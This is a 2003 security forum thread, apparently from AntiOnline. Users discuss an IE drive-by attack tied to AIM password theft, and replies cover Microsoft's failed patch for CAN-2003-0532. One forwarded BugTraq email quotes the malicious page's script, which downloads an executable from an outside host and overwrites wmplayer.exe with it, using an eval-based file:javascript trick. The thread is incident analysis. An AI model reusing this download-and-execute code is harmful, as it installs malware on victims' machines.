Results 1 to 3 of 3

Thread: AIM Password theft

  1. #1
    Join Date
    Jun 2003

    Question AIM Password theft

    My apologies if this is in the wrong furum, I couldn't decide where to post.

    There has been only one reply to the incidents mailing list, and I'm wondering if you folks could provide any insights. I have additional e-mails describing the problem, if anyone's interested.



    ------------email to follow----------------
    The code you just sent looks familiar to a SPAM I received
    attempting to hijack users' e-gold accounts. Out of curiosity I
    followed that link which loaded start.html (attached). What worries me
    is that I'm running IE 6.0.2800.1106 with all the latest patches from
    Microsoft and this page (start.html) rewrote wmplayer.exe on my local
    drive without notice. After closing the page, I found two .exe files on
    my desktop (which loaded from http://doz.linux162.onway.net/eg/1.exe).
    Is this a new unknown vulnerability?

    Brent Meshier
    Global Transport Logistics, Inc.
    "Innovative Fulfillment Solutions"

    -----Original Message-----
    From: Mark Coleman [mailto:markc@uniontown.com]
    Sent: Tuesday, September 23, 2003 11:43 AM
    To: bugtraq@securityfocus.org
    Subject: [Fwd: Re: AIM Password theft]

    Hi, can anyone shed some light on this for me? If this is new, its
    going to spread like wildfire. AOL or incidents lists have yet to
    reply.... it appears to be a legitimate threat as I have at least one
    user "infected" already.. Thank you..

    -Mark Coleman

    <script language="vbs">
    self.MoveTo 5000,5000
    <object data="1.php"></object>

    <textarea id="code" style="display:none;">

    var x = new ActiveXObject("Microsoft.XMLHTTP");
    x.Open("GET", "http://doz.linux162.onway.net/eg/1.exe",0);

    var s = new ActiveXObject("ADODB.Stream");
    s.Mode = 3;
    s.Type = 1;

    s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
    location.href = "mms://";


    <script language="javascript">

    function preparecode(code) {
    result = '';
    lines = code.split(/\r\n/);
    for (i=0;i<lines.length;i++) {

    line = lines[i];
    line = line.replace(/^\s+/,"");
    line = line.replace(/\s+$/,"");
    line = line.replace(/'/g,"\\'");
    line = line.replace(/[\\]/g,"\\\\");
    line = line.replace(/[/]/g,"%2f");

    if (line != '') {
    result += line +'\\r\\n';
    return result;

    function doit() {
    mycode = preparecode(document.all.code.value);
    myURL = "file:javascript:eval('" + mycode + "')";


    setTimeout("doit()", 5000);


  2. #2
    AO übergeek phishphreek's Avatar
    Join Date
    Jan 2002
    There have been several more replies discussing it...


  3. #3
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Washington D.C. area
    Yeah, this has been kicked around BugTraq for a few days now. From what I remember, the patch that is supposed to fix the Data Object issue does not work. MS made a public announcement of this on the main page of the download section. Something about testing the claims that the patch is claimed to be broken and they will release a new one if they can confirm the claim.

    Here is the link and a snip from the page:
    "Microsoft originally issued this bulletin on August 20th, 2003. Subsequent to issuing the security bulletin, Microsoft received reports that the patch provided with this bulletin does not properly correct the Object Type Vulnerability (CAN-2003-0532)."

    See the technical details section.

    Then there is the actual bulletin:
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts